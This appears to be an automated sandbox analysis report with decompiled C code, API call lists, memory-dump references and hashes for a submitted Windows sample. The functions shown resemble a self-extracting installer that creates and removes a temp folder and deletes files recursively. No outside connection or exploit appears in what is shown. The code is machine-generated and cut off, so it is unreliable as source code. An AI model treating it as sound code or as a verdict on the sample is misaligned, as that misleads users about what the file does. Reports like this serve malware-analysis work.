                                                                      C-Code - Quality: 82%
                                                                      			E011D2F1D(void* __ecx, int __edx) {
                                                                      				signed int _v8;
                                                                      				char _v272;
                                                                      				_Unknown_base(*)()* _v276;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t9;
                                                                      				void* _t11;
                                                                      				struct HWND__* _t12;
                                                                      				void* _t14;
                                                                      				int _t21;
                                                                      				signed int _t22;
                                                                      				signed int _t25;
                                                                      				intOrPtr* _t26;
                                                                      				signed int _t27;
                                                                      				void* _t30;
                                                                      				_Unknown_base(*)()* _t31;
                                                                      				void* _t34;
                                                                      				struct HINSTANCE__* _t36;
                                                                      				intOrPtr _t41;
                                                                      				intOrPtr* _t44;
                                                                      				signed int _t46;
                                                                      				int _t47;
                                                                      				void* _t58;
                                                                      				void* _t59;
                                                                      
                                                                      				_t43 = __edx;
                                                                      				_t9 =  *0x11d8004; // 0xdc3102d5
                                                                      				_v8 = _t9 ^ _t46;
                                                                      				if( *0x11d8a38 != 0) {
                                                                      					L5:
                                                                      					_t11 = E011D5164(_t52);
                                                                      					_t53 = _t11;
                                                                      					if(_t11 == 0) {
                                                                      						L16:
                                                                      						_t12 = 0;
                                                                      						L17:
                                                                      						return E011D6CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                                      					}
                                                                      					_t14 = E011D55A0(_t53); // executed
                                                                      					if(_t14 == 0) {
                                                                      						goto L16;
                                                                      					} else {
                                                                      						_t45 = 0x105;
                                                                      						GetSystemDirectoryA( &_v272, 0x105);
                                                                      						_t43 = 0x105;
                                                                      						_t40 =  &_v272;
                                                                      						E011D658A( &_v272, 0x105, "advapi32.dll");
                                                                      						_t36 = LoadLibraryA( &_v272);
                                                                      						_t44 = 0;
                                                                      						if(_t36 != 0) {
                                                                      							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                                      							_v276 = _t31;
                                                                      							if(_t31 != 0) {
                                                                      								_t45 = _t47;
                                                                      								_t40 = _t31;
                                                                      								 *0x11da288("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\", 0); // executed
                                                                      								_v276();
                                                                      								if(_t47 != _t47) {
                                                                      									_t40 = 4;
                                                                      									asm("int 0x29");
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						FreeLibrary(_t36);
                                                                      						_t58 =  *0x11d8a24 - _t44; // 0x0
                                                                      						if(_t58 != 0) {
                                                                      							L14:
                                                                      							_t21 = SetCurrentDirectoryA("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\"); // executed
                                                                      							if(_t21 != 0) {
                                                                      								__eflags =  *0x11d8a2c - _t44; // 0x0
                                                                      								if(__eflags != 0) {
                                                                      									L20:
                                                                      									__eflags =  *0x11d8d48 & 0x000000c0;
                                                                      									if(( *0x11d8d48 & 0x000000c0) == 0) {
                                                                      										_t41 =  *0x11d9a40; // 0x3, executed
                                                                      										_t26 = E011D256D(_t41); // executed
                                                                      										_t44 = _t26;
                                                                      									}
                                                                      									_t22 =  *0x11d8a24; // 0x0
                                                                      									 *0x11d9a44 = _t44;
                                                                      									__eflags = _t22;
                                                                      									if(_t22 != 0) {
                                                                      										L26:
                                                                      										__eflags =  *0x11d8a38;
                                                                      										if( *0x11d8a38 == 0) {
                                                                      											__eflags = _t22;
                                                                      											if(__eflags == 0) {
                                                                      												E011D4169(__eflags);
                                                                      											}
                                                                      										}
                                                                      										_t12 = 1;
                                                                      										goto L17;
                                                                      									} else {
                                                                      										__eflags =  *0x11d9a30 - _t22; // 0x0
                                                                      										if(__eflags != 0) {
                                                                      											goto L26;
                                                                      										}
                                                                      										_t25 = E011D3BA2(); // executed
                                                                      										__eflags = _t25;
                                                                      										if(_t25 == 0) {
                                                                      											goto L16;
                                                                      										}
                                                                      										_t22 =  *0x11d8a24; // 0x0
                                                                      										goto L26;
                                                                      									}
                                                                      								}
                                                                      								_t27 = E011D3B26(_t40, _t44);
                                                                      								__eflags = _t27;
                                                                      								if(_t27 == 0) {
                                                                      									goto L16;
                                                                      								}
                                                                      								goto L20;
                                                                      							}
                                                                      							_t43 = 0x4bc;
                                                                      							E011D44B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                                                                      							 *0x11d9124 = E011D6285();
                                                                      							goto L16;
                                                                      						}
                                                                      						_t59 =  *0x11d9a30 - _t44; // 0x0
                                                                      						if(_t59 != 0) {
                                                                      							goto L14;
                                                                      						}
                                                                      						_t30 = E011D621E(); // executed
                                                                      						if(_t30 == 0) {
                                                                      							goto L16;
                                                                      						}
                                                                      						goto L14;
                                                                      					}
                                                                      				}
                                                                      				_t49 =  *0x11d8a24;
                                                                      				if( *0x11d8a24 != 0) {
                                                                      					L4:
                                                                      					_t34 = E011D3A3F(_t51);
                                                                      					_t52 = _t34;
                                                                      					if(_t34 == 0) {
                                                                      						goto L16;
                                                                      					}
                                                                      					goto L5;
                                                                      				}
                                                                      				if(E011D51E5(_t49) == 0) {
                                                                      					goto L16;
                                                                      				}
                                                                      				_t51 =  *0x11d8a38;
                                                                      				if( *0x11d8a38 != 0) {
                                                                      					goto L5;
                                                                      				}
                                                                      				goto L4;
                                                                      			}




























                                                                      0x011d2f1d
                                                                      0x011d2f28
                                                                      0x011d2f2f
                                                                      0x011d2f3d
                                                                      0x011d2f6c
                                                                      0x011d2f6c
                                                                      0x011d2f71
                                                                      0x011d2f73
                                                                      0x011d3041
                                                                      0x011d3041
                                                                      0x011d3043
                                                                      0x011d3053
                                                                      0x011d3053
                                                                      0x011d2f79
                                                                      0x011d2f80
                                                                      0x00000000
                                                                      0x011d2f86
                                                                      0x011d2f86
                                                                      0x011d2f93
                                                                      0x011d2f9e
                                                                      0x011d2fa0
                                                                      0x011d2fa6
                                                                      0x011d2fb8
                                                                      0x011d2fba
                                                                      0x011d2fbe
                                                                      0x011d2fc6
                                                                      0x011d2fcc
                                                                      0x011d2fd4
                                                                      0x011d2fd6
                                                                      0x011d2fd8
                                                                      0x011d2fe0
                                                                      0x011d2fe6
                                                                      0x011d2fee
                                                                      0x011d2ff0
                                                                      0x011d2ff5
                                                                      0x011d2ff5
                                                                      0x011d2fee
                                                                      0x011d2fd4
                                                                      0x011d2ff8
                                                                      0x011d2ffe
                                                                      0x011d3004
                                                                      0x011d3017
                                                                      0x011d301c
                                                                      0x011d3024
                                                                      0x011d3054
                                                                      0x011d305a
                                                                      0x011d3065
                                                                      0x011d3065
                                                                      0x011d306c
                                                                      0x011d306e
                                                                      0x011d3075
                                                                      0x011d307a
                                                                      0x011d307a
                                                                      0x011d307c
                                                                      0x011d3081
                                                                      0x011d3087
                                                                      0x011d3089
                                                                      0x011d30a1
                                                                      0x011d30a1
                                                                      0x011d30a9
                                                                      0x011d30ab
                                                                      0x011d30ad
                                                                      0x011d30af
                                                                      0x011d30af
                                                                      0x011d30ad
                                                                      0x011d30b6
                                                                      0x00000000
                                                                      0x011d308b
                                                                      0x011d308b
                                                                      0x011d3091
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d3093
                                                                      0x011d3098
                                                                      0x011d309a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d309c
                                                                      0x00000000
                                                                      0x011d309c
                                                                      0x011d3089
                                                                      0x011d305c
                                                                      0x011d3061
                                                                      0x011d3063
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d3063
                                                                      0x011d302b
                                                                      0x011d3032
                                                                      0x011d303c
                                                                      0x00000000
                                                                      0x011d303c
                                                                      0x011d3006
                                                                      0x011d300c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d300e
                                                                      0x011d3015
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d3015
                                                                      0x011d2f80
                                                                      0x011d2f3f
                                                                      0x011d2f46
                                                                      0x011d2f5f
                                                                      0x011d2f5f
                                                                      0x011d2f64
                                                                      0x011d2f66
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d2f66
                                                                      0x011d2f4f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d2f55
                                                                      0x011d2f5d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000

                                                                      APIs
                                                                      • GetSystemDirectoryA.KERNEL32 ref: 011D2F93
                                                                      • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 011D2FB2
                                                                      • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 011D2FC6
                                                                      • DecryptFileA.ADVAPI32 ref: 011D2FE6
                                                                      • FreeLibrary.KERNEL32(00000000), ref: 011D2FF8
                                                                      • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 011D301C
                                                                        • Part of subcall function 011D51E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,011D2F4D,?,00000002,00000000), ref: 011D5201
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
                                                                      • API String ID: 2126469477-58291647
                                                                      • Opcode ID: 11bc5364339b7d96582c4d2fb9ca56b57fca66e7146391941190a7d15ad5fea2
                                                                      • Instruction ID: 1b9fea424e377816ac01b397903ee3a882a572e15f5c43d1b7072dcdcafb6764
                                                                      • Opcode Fuzzy Hash: 11bc5364339b7d96582c4d2fb9ca56b57fca66e7146391941190a7d15ad5fea2
                                                                      • Instruction Fuzzy Hash: F641F771A132169ADB3DAB79AC44B6A37A8FF54758F000179D971C2185EB74C9C0CB63
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 478 11d5467-11d5484 479 11d551c-11d5528 call 11d1680 478->479 480 11d548a-11d5490 call 11d53a1 478->480 484 11d552d-11d5539 call 11d58c8 479->484 483 11d5495-11d5497 480->483 485 11d549d-11d54c0 call 11d1781 483->485 486 11d5581-11d5583 483->486 493 11d554d-11d5552 484->493 494 11d553b-11d5545 CreateDirectoryA 484->494 497 11d550c-11d551a call 11d658a 485->497 498 11d54c2-11d54d8 GetSystemInfo 485->498 489 11d558d-11d559d call 11d6ce0 486->489 495 11d5585-11d558b 493->495 496 11d5554-11d5557 call 11d597d 493->496 500 11d5577-11d557c call 11d6285 494->500 501 11d5547 494->501 495->489 507 11d555c-11d555e 496->507 497->484 505 11d54fe 498->505 506 11d54da-11d54dd 498->506 500->486 501->493 508 11d5503-11d5507 call 11d658a 505->508 511 11d54df-11d54e2 506->511 512 11d54f7-11d54fc 506->512 507->495 513 11d5560-11d5566 507->513 508->497 515 11d54e4-11d54e7 511->515 516 11d54f0-11d54f5 511->516 512->508 513->486 518 11d5568-11d5575 RemoveDirectoryA 513->518 515->497 517 11d54e9-11d54ee 515->517 516->508 517->508 518->486
                                                                      C-Code - Quality: 75%
                                                                      			E011D5467(CHAR* __ecx, void* __edx, char* _a4) {
                                                                      				signed int _v8;
                                                                      				char _v268;
                                                                      				struct _SYSTEM_INFO _v304;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t10;
                                                                      				void* _t13;
                                                                      				intOrPtr _t14;
                                                                      				void* _t16;
                                                                      				void* _t20;
                                                                      				signed int _t26;
                                                                      				void* _t28;
                                                                      				void* _t29;
                                                                      				CHAR* _t48;
                                                                      				signed int _t49;
                                                                      				intOrPtr _t61;
                                                                      
                                                                      				_t10 =  *0x11d8004; // 0xdc3102d5
                                                                      				_v8 = _t10 ^ _t49;
                                                                      				_push(__ecx);
                                                                      				if(__edx == 0) {
                                                                      					_t48 = 0x11d91e4;
                                                                      					_t42 = 0x104;
                                                                      					E011D1680(0x11d91e4, 0x104);
                                                                      					L14:
                                                                      					_t13 = E011D58C8(_t48); // executed
                                                                      					if(_t13 != 0) {
                                                                      						L17:
                                                                      						_t42 = _a4;
                                                                      						if(_a4 == 0) {
                                                                      							L23:
                                                                      							 *0x11d9124 = 0;
                                                                      							_t14 = 1;
                                                                      							L24:
                                                                      							return E011D6CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                                      						}
                                                                      						_t16 = E011D597D(_t48, _t42, 1, 0); // executed
                                                                      						if(_t16 != 0) {
                                                                      							goto L23;
                                                                      						}
                                                                      						_t61 =  *0x11d8a20; // 0x0
                                                                      						if(_t61 != 0) {
                                                                      							 *0x11d8a20 = 0;
                                                                      							RemoveDirectoryA(_t48);
                                                                      						}
                                                                      						L22:
                                                                      						_t14 = 0;
                                                                      						goto L24;
                                                                      					}
                                                                      					if(CreateDirectoryA(_t48, 0) == 0) {
                                                                      						 *0x11d9124 = E011D6285();
                                                                      						goto L22;
                                                                      					}
                                                                      					 *0x11d8a20 = 1;
                                                                      					goto L17;
                                                                      				}
                                                                      				_t42 =  &_v268;
                                                                      				_t20 = E011D53A1(__ecx,  &_v268); // executed
                                                                      				if(_t20 == 0) {
                                                                      					goto L22;
                                                                      				}
                                                                      				_push(__ecx);
                                                                      				_t48 = 0x11d91e4;
                                                                      				E011D1781(0x11d91e4, 0x104, __ecx,  &_v268);
                                                                      				if(( *0x11d9a34 & 0x00000020) == 0) {
                                                                      					L12:
                                                                      					_t42 = 0x104;
                                                                      					E011D658A(_t48, 0x104, 0x11d1140);
                                                                      					goto L14;
                                                                      				}
                                                                      				GetSystemInfo( &_v304);
                                                                      				_t26 = _v304.dwOemId & 0x0000ffff;
                                                                      				if(_t26 == 0) {
                                                                      					_push("i386");
                                                                      					L11:
                                                                      					E011D658A(_t48, 0x104);
                                                                      					goto L12;
                                                                      				}
                                                                      				_t28 = _t26 - 1;
                                                                      				if(_t28 == 0) {
                                                                      					_push("mips");
                                                                      					goto L11;
                                                                      				}
                                                                      				_t29 = _t28 - 1;
                                                                      				if(_t29 == 0) {
                                                                      					_push("alpha");
                                                                      					goto L11;
                                                                      				}
                                                                      				if(_t29 != 1) {
                                                                      					goto L12;
                                                                      				}
                                                                      				_push("ppc");
                                                                      				goto L11;
                                                                      			}




















                                                                      0x011d5472
                                                                      0x011d5479
                                                                      0x011d5481
                                                                      0x011d5484
                                                                      0x011d551c
                                                                      0x011d5521
                                                                      0x011d5528
                                                                      0x011d552d
                                                                      0x011d552f
                                                                      0x011d5539
                                                                      0x011d554d
                                                                      0x011d554d
                                                                      0x011d5552
                                                                      0x011d5585
                                                                      0x011d5585
                                                                      0x011d558b
                                                                      0x011d558d
                                                                      0x011d559d
                                                                      0x011d559d
                                                                      0x011d5557
                                                                      0x011d555e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d5560
                                                                      0x011d5566
                                                                      0x011d5569
                                                                      0x011d556f
                                                                      0x011d556f
                                                                      0x011d5581
                                                                      0x011d5581
                                                                      0x00000000
                                                                      0x011d5581
                                                                      0x011d5545
                                                                      0x011d557c
                                                                      0x00000000
                                                                      0x011d557c
                                                                      0x011d5547
                                                                      0x00000000
                                                                      0x011d5547
                                                                      0x011d548a
                                                                      0x011d5490
                                                                      0x011d5497
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d549d
                                                                      0x011d54ab
                                                                      0x011d54b4
                                                                      0x011d54c0
                                                                      0x011d550c
                                                                      0x011d5511
                                                                      0x011d5515
                                                                      0x00000000
                                                                      0x011d5515
                                                                      0x011d54c9
                                                                      0x011d54d6
                                                                      0x011d54d8
                                                                      0x011d54fe
                                                                      0x011d5503
                                                                      0x011d5507
                                                                      0x00000000
                                                                      0x011d5507
                                                                      0x011d54da
                                                                      0x011d54dd
                                                                      0x011d54f7
                                                                      0x00000000
                                                                      0x011d54f7
                                                                      0x011d54df
                                                                      0x011d54e2
                                                                      0x011d54f0
                                                                      0x00000000
                                                                      0x011d54f0
                                                                      0x011d54e7
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d54e9
                                                                      0x00000000

                                                                      APIs
                                                                      • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 011D54C9
                                                                      • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 011D553D
                                                                      • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 011D556F
                                                                        • Part of subcall function 011D53A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 011D53FB
                                                                        • Part of subcall function 011D53A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 011D5402
                                                                        • Part of subcall function 011D53A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 011D541F
                                                                        • Part of subcall function 011D53A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 011D542B
                                                                        • Part of subcall function 011D53A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 011D5434
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
                                                                      • API String ID: 1979080616-186922987
                                                                      • Opcode ID: e1fab79cd94162263e3e5ad21b1dfed8bffedec25706d9d0603a51364773b085
                                                                      • Instruction ID: 07b3003909719bb01392a76ae3c732507c14ffc67a1ad823ace9feea3380c0de
                                                                      • Opcode Fuzzy Hash: e1fab79cd94162263e3e5ad21b1dfed8bffedec25706d9d0603a51364773b085
                                                                      • Instruction Fuzzy Hash: C2314771B02225ABDB6D9E3D9C44A7F7BBBAB91254B84013AE902C2144DF74CA41C792
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      C-Code - Quality: 86%
                                                                      			E011D2390(CHAR* __ecx) {
                                                                      				signed int _v8;
                                                                      				char _v276;
                                                                      				char _v280;
                                                                      				char _v284;
                                                                      				struct _WIN32_FIND_DATAA _v596;
                                                                      				struct _WIN32_FIND_DATAA _v604;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t21;
                                                                      				int _t36;
                                                                      				void* _t46;
                                                                      				void* _t62;
                                                                      				void* _t63;
                                                                      				CHAR* _t65;
                                                                      				void* _t66;
                                                                      				signed int _t67;
                                                                      				signed int _t69;
                                                                      
                                                                      				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                                      				_t21 =  *0x11d8004; // 0xdc3102d5
                                                                      				_t22 = _t21 ^ _t69;
                                                                      				_v8 = _t21 ^ _t69;
                                                                      				_t65 = __ecx;
                                                                      				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                                      					L10:
                                                                      					_pop(_t62);
                                                                      					_pop(_t66);
                                                                      					_pop(_t46);
                                                                      					return E011D6CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                                      				} else {
                                                                      					E011D1680( &_v276, 0x104, __ecx);
                                                                      					_t58 = 0x104;
                                                                      					E011D16B3( &_v280, 0x104, "*");
                                                                      					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                                      					_t63 = _t22;
                                                                      					if(_t63 == 0xffffffff) {
                                                                      						goto L10;
                                                                      					} else {
                                                                      						goto L3;
                                                                      					}
                                                                      					do {
                                                                      						L3:
                                                                      						_t58 = 0x104;
                                                                      						E011D1680( &_v276, 0x104, _t65);
                                                                      						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                                      							_t58 = 0x104;
                                                                      							E011D16B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                                      							SetFileAttributesA( &_v280, 0x80);
                                                                      							DeleteFileA( &_v280);
                                                                      						} else {
                                                                      							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                                      								E011D16B3( &_v276, 0x104,  &(_v596.cFileName));
                                                                      								_t58 = 0x104;
                                                                      								E011D658A( &_v280, 0x104, 0x11d1140);
                                                                      								E011D2390( &_v284);
                                                                      							}
                                                                      						}
                                                                      						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                                      					} while (_t36 != 0);
                                                                      					FindClose(_t63); // executed
                                                                      					_t22 = RemoveDirectoryA(_t65); // executed
                                                                      					goto L10;
                                                                      				}
                                                                      			}





















                                                                      0x011d2398
                                                                      0x011d239e
                                                                      0x011d23a3
                                                                      0x011d23a5
                                                                      0x011d23ae
                                                                      0x011d23b3
                                                                      0x011d24cb
                                                                      0x011d24d2
                                                                      0x011d24d3
                                                                      0x011d24d4
                                                                      0x011d24df
                                                                      0x011d23c2
                                                                      0x011d23d1
                                                                      0x011d23db
                                                                      0x011d23e4
                                                                      0x011d23f6
                                                                      0x011d23fc
                                                                      0x011d2401
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d2407
                                                                      0x011d2407
                                                                      0x011d2408
                                                                      0x011d2411
                                                                      0x011d241f
                                                                      0x011d247a
                                                                      0x011d2483
                                                                      0x011d2495
                                                                      0x011d24a3
                                                                      0x011d2421
                                                                      0x011d242f
                                                                      0x011d2453
                                                                      0x011d245d
                                                                      0x011d2466
                                                                      0x011d2472
                                                                      0x011d2472
                                                                      0x011d242f
                                                                      0x011d24af
                                                                      0x011d24b5
                                                                      0x011d24be
                                                                      0x011d24c5
                                                                      0x00000000
                                                                      0x011d24c5

                                                                      APIs
                                                                      • FindFirstFileA.KERNELBASE(?,011D8A3A,011D11F4,011D8A3A,00000000,?,?), ref: 011D23F6
                                                                      • lstrcmpA.KERNEL32(?,011D11F8), ref: 011D2427
                                                                      • lstrcmpA.KERNEL32(?,011D11FC), ref: 011D243B
                                                                      • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 011D2495
                                                                      • DeleteFileA.KERNEL32(?), ref: 011D24A3
                                                                      • FindNextFileA.KERNELBASE(00000000,00000010), ref: 011D24AF
                                                                      • FindClose.KERNELBASE(00000000), ref: 011D24BE
                                                                      • RemoveDirectoryA.KERNELBASE(011D8A3A), ref: 011D24C5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                      • String ID:
                                                                      • API String ID: 836429354-0
                                                                      • Opcode ID: 72abc052bb161d9775e73370d3c70ff317a218e7de1d30072bc92eeca8c9ac80
                                                                      • Instruction ID: ce6f304be6a0ceeb7648285ed18c4367c00103b99f6a262edd4b35c773a3464b
                                                                      • Opcode Fuzzy Hash: 72abc052bb161d9775e73370d3c70ff317a218e7de1d30072bc92eeca8c9ac80
                                                                      • Instruction Fuzzy Hash: 3D31B332605741ABD338EBB8DD88AEB77ECAFD4309F04493DA96583280EF749549C752
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 70%
                                                                      			E011D2BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				void* __ebp;
                                                                      				long _t4;
                                                                      				void* _t6;
                                                                      				intOrPtr _t7;
                                                                      				void* _t9;
                                                                      				struct HINSTANCE__* _t12;
                                                                      				intOrPtr* _t17;
                                                                      				signed char _t19;
                                                                      				intOrPtr* _t21;
                                                                      				void* _t22;
                                                                      				void* _t24;
                                                                      				intOrPtr _t32;
                                                                      
                                                                      				_t4 = GetVersion();
                                                                      				if(_t4 >= 0 && _t4 >= 6) {
                                                                      					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                                      					if(_t12 != 0) {
                                                                      						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                                      						if(_t21 != 0) {
                                                                      							_t17 = _t21;
                                                                      							 *0x11da288(0, 1, 0, 0);
                                                                      							 *_t21();
                                                                      							_t29 = _t24 - _t24;
                                                                      							if(_t24 != _t24) {
                                                                      								_t17 = 4;
                                                                      								asm("int 0x29");
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				_t20 = _a12;
                                                                      				_t18 = _a4;
                                                                      				 *0x11d9124 = 0;
                                                                      				if(E011D2CAA(_a4, _a12, _t29, _t17) != 0) {
                                                                      					_t9 = E011D2F1D(_t18, _t20); // executed
                                                                      					_t22 = _t9; // executed
                                                                      					E011D52B6(0, _t18, _t21, _t22); // executed
                                                                      					if(_t22 != 0) {
                                                                      						_t32 =  *0x11d8a3a; // 0x0
                                                                      						if(_t32 == 0) {
                                                                      							_t19 =  *0x11d9a2c; // 0x0
                                                                      							if((_t19 & 0x00000001) != 0) {
                                                                      								E011D1F90(_t19, _t21, _t22);
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				_t6 =  *0x11d8588; // 0x0
                                                                      				if(_t6 != 0) {
                                                                      					CloseHandle(_t6);
                                                                      				}
                                                                      				_t7 =  *0x11d9124; // 0x0
                                                                      				return _t7;
                                                                      			}


















                                                                      0x011d2c03
                                                                      0x011d2c0d
                                                                      0x011d2c18
                                                                      0x011d2c20
                                                                      0x011d2c2e
                                                                      0x011d2c32
                                                                      0x011d2c36
                                                                      0x011d2c3d
                                                                      0x011d2c43
                                                                      0x011d2c45
                                                                      0x011d2c47
                                                                      0x011d2c49
                                                                      0x011d2c4e
                                                                      0x011d2c4e
                                                                      0x011d2c47
                                                                      0x011d2c32
                                                                      0x011d2c20
                                                                      0x011d2c50
                                                                      0x011d2c54
                                                                      0x011d2c57
                                                                      0x011d2c64
                                                                      0x011d2c66
                                                                      0x011d2c6b
                                                                      0x011d2c6d
                                                                      0x011d2c74
                                                                      0x011d2c76
                                                                      0x011d2c7c
                                                                      0x011d2c7e
                                                                      0x011d2c87
                                                                      0x011d2c89
                                                                      0x011d2c89
                                                                      0x011d2c87
                                                                      0x011d2c7c
                                                                      0x011d2c74
                                                                      0x011d2c8e
                                                                      0x011d2c95
                                                                      0x011d2c98
                                                                      0x011d2c98
                                                                      0x011d2c9e
                                                                      0x011d2ca7

                                                                      APIs
                                                                      • GetVersion.KERNEL32(?,00000002,00000000,?,011D6BB0,011D0000,00000000,00000002,0000000A), ref: 011D2C03
                                                                      • GetModuleHandleW.KERNEL32(Kernel32.dll,?,011D6BB0,011D0000,00000000,00000002,0000000A), ref: 011D2C18
                                                                      • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 011D2C28
                                                                      • CloseHandle.KERNEL32(00000000,?,?,011D6BB0,011D0000,00000000,00000002,0000000A), ref: 011D2C98
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmpDownload File
